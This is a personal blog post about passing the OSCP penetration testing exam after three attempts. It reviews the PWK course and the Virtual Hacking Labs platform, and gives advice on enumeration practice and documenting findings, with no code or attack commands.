oscp pwk ejpt vhl cyber hack hacking certification

OSCP Passed

Some Introspection on the most difficult IT exam taken to date

Posted by Asa Hess-Matsumoto on Thursday, February 11, 2021

Preamble

I received a notification the other day from Offensive Security that I passed their exam for the Offensive Security Certified Professional (OSCP) certification. This certificate is notable for its difficulty and its implementation, requiring the test-taker to exercise a broad range of skills to evaluate, compromise, and escalate privileges on 5 distinct targets.

Some would describe the OSCP as an entry-level certification; I would disagree with what that statement conveys, but not with what I believe it’s intended to imply. People who are new to Information Technology (IT) or CyberSecurity will find the exam enormously challenging; compared to most other certifications that are similarly labeled as “entry-level” (CompTIA Security+, Certified Ethical Hacker, etc), expecting someone to pass this exam so early in their career is an incredible ask. The skillset required to attain the OSCP is broad and dense, including (but not limited to):

  • Linux and Windows OS command line interfaces
  • Bash scripting
  • Buffer Overflow exploit drafting
  • File transfers
  • Information Gathering (both active and passive)
  • Password attacks
  • Privilege Escalation
  • Web Application Attacks

This certification only scratches the surface of potential avenues a burgeoning hacker (or cyber security professional) might want to explore

However, despite the wide array of skills necessary to engage the exam, this certification only scratches the surface of potential avenues a burgeoning hacker (or cyber security professional) might want to explore; this is what I think the statement of “entry-level” is intended to imply. For example, this course doesn’t go diving into code analysis, web application exploitation, or reverse engineering. What this certification does fundamentally force students to learn is a methodology: how to assess and evaluate a target for potential vulnerabilities, how to test a vulnerability’s exploitability, and steps taken to enumerate a target once its compromised; it forces students to work with tools they may have never used before, encouraging them to research and understand the vulnerabilities and exploits they will need to employ.

Offensive Security offers an accompanying training course that is intended to help prepare students for the OSCP: “Penetration Testing With Kali Linux” (PWK). Taking the course equips the student with educational reading, a series of coursework challenges, and access to a lab environment that loosely-models itself to a corporate network for practice.

Personally, I found the course to have some mixed value. From strictly an educational perspective, it’s wonderful. The coursework built upon methods and techniques I was exposed to from e-LeanSecurity’s Junior Penetration Tester (eJPT) course; it introduced me to many new procedures and technologies I hadn’t seen (such as PowerShell Empire and ProxyChains); and it challenged me in ways that forced me to learn difficult and complex topics. However, for all these strengths, the PWK coursework does not effectively prepare a student for the OSCP exam. The skills necessary to pass are diluted by a plethora of (admittedly interesting) other topics, such as active directory and network pivoting; the peer-led support for working through the lab environment isn’t learning-oriented (students offering hints to other students do not make for the best teachers - more often they mistake coy riddles as an effective substitute for engaged discussion); and the cost for having access to the lab is significantly greater than comparable services.

One other thing I want to mention about the PWK is the extra credit; by completing and documenting all of the coursework as well as performing a writeup on how you were able to compromise at least 10 different targets within the lab environment using distinct techniques, you can earn up to 5 points of extra credit on your exam. It should be noted, however, that the time it takes to perform these tasks is significant. The coursework alone took me just over a month to complete. That said, I would not have passed my exam had I not gone this extra mile.

I ended up taking the exam three times in order to pass.

First Exam

In my first attempt, there were several things I did right and wrong. Contrary to my above criticism of the PWK, one technique the course does a phenomenal job of teaching is in the development of a Buffer Overflow exploit. In brief, a buffer overflow occurs when some input (typically from a user) exceeds what the program expects, causing the input to “overflow” into memory; by systematically evaluating how the input overflows into program memory, an attacker is able to inject a malicious payload to be ran and executed with privileges. By not only understanding, but preemptively codifying my steps to perform a buffer overflow exploit, I really empowered myself for the exam.

While I was well prepared in that aspect, I hadn’t done enough to refine my enumeration methods; as such, I flailed about trying to find a foothold on many of the targets. I looked for - and failed to find - vulnerabilities that would enable me to achieve Remote Code Execution (RCE) on my targets. I believe that the root cause for this was my reliance on the hints provided by my peers within the PWK student forums; to be clear, I think that when initially learning how to use the tools and technologies involved in hacking it helps to be transparent. However, there comes a time when you need to develop the skill of enumeration - the act of discovering vulnerabilities in a black-box environment.

Second Exam

My second attempt went very similar to my first - I had attempted to prepare for the exam by watching various Hack the Box (HTB) solutions posted by IppSec on Youtube. However, by not practicing the act of enumerating, I found myself repeating the same mistakes as my first attempt.

Third Exam

In preparing for my third attempt, I went back and got a subscription to a parallel course to the PWK, Virtual Hacking Labs (VHL). This platform offers a similar coursework/lab setup as the PWK, but I found that the community was far more interested invested in each others’ learning.

For a review of VHL, see my post here.

By abstaining from using hints, I really was able to develop my enumeration skillset. This carried quite a bit of water in my third and final attempt at the exam. I also overhauled how I was documenting my findings/work by using CherryTree (previously, I just copy/pasted directly into a Microsoft Word document and used assorted headers to organize). This was enormously helpful in keeping me focused and organized; it also payed dividends when it came time to write up the final report.

Takeaways:

  • The OSCP certification exam is challenging; it takes a significant amount of time and effort in order to properly prepare for it.
  • The PWK coursework/labs - while beneficial - are not optimized for preparing students for the exam.
  • There are a number of non-Offensive Security resources I found valuable in my studies (linked above and in the VHL review).
  • It’s critical to perform a post-mortem of your failures in order to foster growth.
FEATURED TAGS
aws badusb bandit book books box c ceh certification chisel cloud coding crto cryptography ctf cyber dante ejpt exploitation gradschool hack hacking hackthebox htb javascript leetcode md5 nmap oscp overthewire pentesteracademy pentesting pico picoctf pivot pivoting programming pwk python reading reverse-engineering reversing riceteacatpanda suidcheck synack the vhl writeup
FRIENDS